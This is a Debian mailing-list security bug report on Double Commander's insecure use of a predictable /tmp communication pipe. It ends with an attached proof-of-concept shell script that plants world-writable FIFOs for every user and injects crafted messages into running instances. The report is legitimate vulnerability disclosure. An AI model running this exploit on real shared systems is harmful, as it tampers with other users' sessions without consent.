[Pkg-pascal-devel] Bug#926223: doublecmd-gtk: insecure use of /tmp
Jakub Wilk
jwilk at jwilk.net
Tue Apr 2 10:32:31 BST 2019
Package: doublecmd-gtk
Version: 0.9.1-1
Tags: security
Double Commander uses /tmp/doublecmd--<uid> for communication, even when
this file is owned by another user.
Local attacker could exploit this to load paths into other users'
panels. Proof-of-concept exploit is attached.
Please move the communication pipe out of /tmp.
-- System Information:
Architecture: i386
--
Jakub Wilk
-------------- next part --------------
#!/bin/sh
set -e -u
cd /tmp
getent passwd | while IFS=: read -r user _ uid _
do
fifo="doublecmd--$uid"
rm -f "$fifo" || true # maybe stale fifo from the previous exploit run?
if ! mkfifo -m 666 "$fifo"
then
printf 'Failed to mount the exploit against %s; Maybe try again later?\n' "$user"
continue
fi
done
while true
do
for uid in $(ps --no-headers -C doublecmd -o uid)
do
sleep 1
fifo="doublecmd--$uid"
path=$(find /bin /sbin /usr/bin /usr/sbin /usr/games | shuf -n 1)
len=${#path}
pad=$((1024-len))
{
printf '\1\5\20\0\0\5\20\0\0\0\1%02050d' | tr '0' '\0'
printf '%s' "$path"
printf "%0${pad}d\1%01024d" | tr '0' '\0'
} > "$fifo"
done
sleep 1
done
More information about the Pkg-pascal-devel
mailing list